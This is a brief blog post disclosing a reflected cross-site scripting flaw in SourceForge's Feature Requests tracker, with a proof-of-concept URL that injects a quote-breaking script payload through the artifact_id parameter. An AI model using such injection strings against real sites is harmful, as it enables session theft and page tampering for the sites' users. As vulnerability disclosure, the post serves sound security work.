Search This Blog

SourceForge.net vulnerable to Cross site scripting(XSS)

Grey hat hacker called as "Sony" has discovered Cross site scripting vulnerability in SourceForge.net website. SourceForge is one of best website that hosts best open source projects such as 7zip, ophcrack and our HashcodeCracker project.

The Artifact ID field in the Feature Requests tracker page vulnerable to XSS attack.  Hacker said this is not critical bug.

Poc:
http://sourceforge.net/tracker/?limit=25&func=&group_id=551517&atid=2238316&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\&assignee=&status=&category=&artgroup=&submitter=&keyword=&artifact_id=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&submit=Filter 


Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability